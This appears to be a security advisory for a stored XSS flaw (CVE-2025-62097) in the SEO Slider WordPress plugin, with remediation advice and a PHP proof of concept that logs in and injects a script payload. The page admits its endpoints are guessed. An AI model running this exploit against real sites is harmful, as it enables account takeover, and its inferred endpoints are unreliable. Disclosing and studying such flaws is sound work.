Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 20, 2026

CVE-2025-62097: SEO Slider <= 1.1.1 – Authenticated (Contributor+) Stored Cross-Site Scripting (seo-slider)

Plugin seo-slider
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 1.1.1
Patched Version
Disclosed December 30, 2025

Analysis Overview

Atomic Edge analysis of CVE-2025-62097 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the SEO Slider WordPress plugin, affecting versions up to and including 1.1.1. The vulnerability allows attackers with contributor-level or higher WordPress user privileges to inject malicious scripts into site pages. These scripts execute in the browsers of any user viewing the compromised page.

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping, as indicated by the CWE-79 classification and the vulnerability description. The plugin likely fails to properly sanitize user-supplied input before storing it in the database, and also fails to escape that data when outputting it in the frontend or admin interface. This conclusion is inferred from the CWE and description, as the source code is not available for direct confirmation.

Exploitation requires an authenticated WordPress user account with at least contributor-level permissions. The attacker would likely target a plugin feature that accepts user input, such as slider title, description, or configuration fields. A typical payload would be a JavaScript payload like `alert(document.domain)` or a more malicious script designed to steal session cookies. The exact endpoint is unknown, but WordPress plugin patterns suggest the attack vector could be an AJAX handler (`admin-ajax.php` with a plugin-specific action), a REST API endpoint, or a direct POST request to a plugin admin page.

Remediation requires implementing proper input validation and output escaping. The plugin should sanitize all user input using WordPress functions like `sanitize_text_field()` or `wp_kses()` before storage. The plugin must also escape all dynamic output with functions like `esc_html()` or `esc_attr()` depending on context. A nonce check should also be added to relevant form submissions to prevent CSRF attacks.

Successful exploitation leads to stored XSS attacks. Injected scripts execute with the privileges of the victim viewing the page. This can result in session hijacking, account takeover, defacement, or redirection to malicious sites. The CVSS vector indicates a scope change (S:C), meaning the vulnerability can impact components outside the plugin’s security authority, potentially affecting the entire WordPress site.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-62097 - SEO Slider <= 1.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
<?php
/**
 * Proof of Concept for CVE-2025-62097.
 * This script demonstrates the exploitation flow for the stored XSS vulnerability.
 * The exact endpoint and parameter names are inferred from WordPress plugin patterns.
 * Assumptions:
 * 1. The plugin uses a standard WordPress AJAX handler or admin POST endpoint.
 * 2. The vulnerable parameter accepts unsanitized HTML/JavaScript input.
 * 3. The attacker has valid contributor-level credentials.
 */

$target_url = 'https://example.com'; // CHANGE THIS
$username = 'contributor_user';      // CHANGE THIS
$password = 'contributor_pass';      // CHANGE THIS

// Payload to inject - a simple alert to demonstrate script execution
$payload = '<script>alert("XSS via SEO Slider - "+document.domain)</script>';

// Initialize cURL session for WordPress login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);

// Check login success by looking for dashboard redirect or absence of login error
if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}

// Attempt exploitation via inferred AJAX endpoint (common pattern)
// The exact action name is unknown; using plugin slug as base assumption
$ajax_data = [
    'action' => 'seo_slider_save', // INFERRED - common pattern for slider plugins
    'slider_title' => 'Test Slider',
    'slider_content' => $payload, // Inject payload into a content field
    'nonce' => '' // Nonce may be required; absence could be part of vulnerability
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, $ajax_data);
$ajax_response = curl_exec($ch);

// Alternative: Attempt via admin POST handler if AJAX fails
if (strpos($ajax_response, 'error') !== false || trim($ajax_response) === '0') {
    $adminpost_data = [
        'action' => 'seo_slider_update',
        'slider_data' => $payload,
        '_wpnonce' => '' // Nonce may be missing
    ];
    curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-post.php');
    curl_setopt($ch, CURLOPT_POSTFIELDS, $adminpost_data);
    $adminpost_response = curl_exec($ch);
    echo 'Admin-post attempt response: ' . htmlspecialchars($adminpost_response) . "n";
} else {
    echo 'AJAX attempt response: ' . htmlspecialchars($ajax_response) . "n";
}

curl_close($ch);
unlink('cookies.txt');

echo 'POC completed. Check the frontend slider for XSS execution.n';
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School